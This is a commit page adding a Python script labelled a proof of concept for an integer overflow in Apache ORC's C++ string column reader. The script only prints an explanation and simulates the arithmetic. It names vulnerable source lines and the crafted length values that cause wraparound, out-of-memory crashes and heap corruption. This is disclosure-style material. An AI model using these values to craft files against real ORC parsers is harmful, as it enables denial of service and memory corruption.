0xiviel commited on
Commit
ecf1516
·
verified ·
1 Parent(s): d31609d

Upload poc_orc_string_overflow.py with huggingface_hub

Browse files
Files changed (1) hide show
  1. poc_orc_string_overflow.py +67 -0
poc_orc_string_overflow.py ADDED
@@ -0,0 +1,67 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python3
2
+ """
3
+ PoC: Apache ORC String Length Integer Overflow
4
+ ===============================================
5
+
6
+ Root cause: ColumnReader.cc:697
7
+ totalLength += static_cast<size_t>(lengths[i]);
8
+ // lengths[i] is int64_t from unsigned RLE decoder — NO negative check
9
+
10
+ String lengths decoded by unsigned RLE (isSigned=false, line 645)
11
+ are stored as int64_t. Values >= 2^63 become negative. static_cast<size_t>
12
+ on negative int64_t produces huge size_t → OOM or wrap-to-zero.
13
+ """
14
+ import struct
15
+
16
+ def show_overflow():
17
+ print("ORC StringDirectColumnReader::computeSize() Integer Overflow")
18
+ print("=" * 60)
19
+ print()
20
+ print("Vulnerable code (ColumnReader.cc:691-706):")
21
+ print(" size_t totalLength = 0;")
22
+ print(" for (i = 0; i < numValues; ++i)")
23
+ print(" totalLength += static_cast<size_t>(lengths[i]); // NO CHECK!")
24
+ print()
25
+ print("How negative lengths occur:")
26
+ print(" 1. RLE decoder is unsigned (isSigned=false, line 645)")
27
+ print(" 2. Output stored in int64_t* (line 715-718)")
28
+ print(" 3. uint64 values >= 2^63 become negative int64_t")
29
+ print(" 4. static_cast<size_t>(negative) = huge positive")
30
+ print()
31
+
32
+ test_cases = [
33
+ ("OOM DoS: single huge length", [2**63]),
34
+ ("Wrap to 0: two lengths", [2**64 - 1, 1]),
35
+ ("Wrap to 1: crafted pair", [2**64 - 100, 101]),
36
+ ]
37
+
38
+ for desc, uint_lengths in test_cases:
39
+ print(f"Case: {desc}")
40
+ total = 0
41
+ for ul in uint_lengths:
42
+ as_int64 = struct.unpack('q', struct.pack('Q', ul % (2**64)))[0]
43
+ as_size_t = ul % (2**64)
44
+ total = (total + as_size_t) % (2**64)
45
+ print(f" RLE uint64={ul:#018x} -> int64={as_int64} -> size_t={as_size_t:#018x}")
46
+ print(f" totalLength = {total} ({total:#018x})")
47
+ if total == 0:
48
+ print(" -> blob.resize(0) -> EMPTY BLOB")
49
+ print(" -> ptr += lengths[i] with negative -> WILD POINTER -> OOB read")
50
+ elif total < 1000:
51
+ print(f" -> blob.resize({total}) -> UNDERSIZED BUFFER")
52
+ print(" -> actual data > blob size -> HEAP CORRUPTION")
53
+ elif total > 2**40:
54
+ print(f" -> blob.resize({total}) -> ALLOCATION FAILURE -> OOM CRASH")
55
+ print()
56
+
57
+ print("Additional: Stripe offset overflow (Reader.cc:591)")
58
+ print(" stripeFooterStart = offset + index_length + data_length")
59
+ print(" All uint64 from protobuf, no overflow check")
60
+ print(" -> wraps around -> reads wrong file location")
61
+ print()
62
+ print("ORC C++ has ZERO safe arithmetic in core parsing code")
63
+ print(" Reader.cc: 0 overflow checks in 1830 lines")
64
+ print(" ColumnReader.cc: 0 overflow checks in 1793 lines")
65
+
66
+ if __name__ == "__main__":
67
+ show_overflow()